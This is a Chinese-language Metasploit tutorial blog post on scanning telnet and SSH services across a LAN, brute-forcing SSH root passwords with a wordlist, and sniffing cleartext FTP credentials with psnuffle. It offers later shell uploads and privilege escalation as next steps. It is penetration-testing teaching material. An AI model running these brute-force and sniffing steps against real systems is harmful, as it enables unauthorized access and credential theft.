温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Metasploit学习三常见的服务扫描与口令猜解

发布时间:2020-07-15 11:54:06 来源:网络 阅读:1018 作者:bazhinv 栏目:安全技术

有的时候我们利用了Nmap发现了端口和服务器上的服务器,然而我们并不是专业的hack,很多时候或许我们只能破FTP 共享和telnet,虽然够低端,但是如果你已经在一个局域网中了,上面3个服务器必然会存在。

利用telnet来扫描

>search telnet_version  查找telnet扫描模块

>use auxiliary/scanner/telnet/telnet_version  使用该模块

>set RHOSTS 192.168.1.0/24 进行整个网段扫描

>set THREADS 100 设置线程,这个数值可以自己定义

>run

利用ssh来扫描


>search ssh_version  查找ssh扫描模块

>use auxiliary/scanner/telnet/ssh_version  这个版本可能是其他的

>set RHOSTS 192.168.1.0/24 进行整个网段扫描

>set THREADS 100 设置线程,这个数值可以自己定义

>run

利用services来进行扫描的方法都是大同小异,如果想利用其他的services进行扫描,可以先

>search name_version 扫描出具体支持哪些服务,当然这是个积累的过程,常用的扫描还有oracle Mssql mysql等等,当然其实很多时候我们都是在抓瞎,Nmap足以解决问题了,更多的时候我们使用这个工具就是为了后面的猜解和监听做准备,下面就讲解一些猜解方法。

SSH服务口令猜解

SSH服务器相当于windows下的FTP,我想多数管理员是不会配置密码的,因为SSH可以通过公钥配对加密和验证的,而且很难猜解,当然也许有的管理员就设置了账户密码,这样的时候我们就可以利用下面的命令进行猜解了,当然你得有一张足够大的彩虹表

>search ssh 如果熟练了可以直接敲路径了,反正我是记不住,而且模块众多,短时间很难掌握全。

>use auxiliary/scanner/ssh/ssh_login 选择ssh口令猜解模块

>set RHOSTS 192.168.1.105 设置hosts

>set USERNAME root    设置用户名为root

>set set PASS_FILE/root/password.txt 这个字典自己做啦,工具很多,好坏就在于字典了

>set THREADS 50 设置线程数,这个设置多了可能会死机,会拒绝服务,设置少了猜解会慢

>run

因为我不会拿自己的职业生涯开玩笑,所以我只在我自己搭建的环境下试验过,所以效果如何不敢评价,总是不太好吧。

FTP嗅探工具psnuffle

这个工具是嗅探明文传送的FTP的,所以所见即所得,内网破解很实用,尤其是在win系统下,如果是利用IIS搭建的FTP服务,那么你嗅探到的账户肯定具有user权限,而后怎么提权就自己想去吧,如果利用FTP软件,这个账户即使得到个人感觉用处也不大,除非可以获得写权限,这样可以上传shell.好吧,不多讲了,看下psnuffle这个绕口的工具的使用方法:

>use auxiliary/sniffer/psnuffle

>run

当然你如果确定了端口也可以进行一些限制,使用set命令就好,这个嗅探可能需要开那么几个小时,因为谁也不知道啥时候会有人登陆FTP,有的时候我在局域网了,我宁愿做DNS欺骗,感觉这样更加简单暴力,当然,也许直接就被防火墙抓了,呵呵




向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI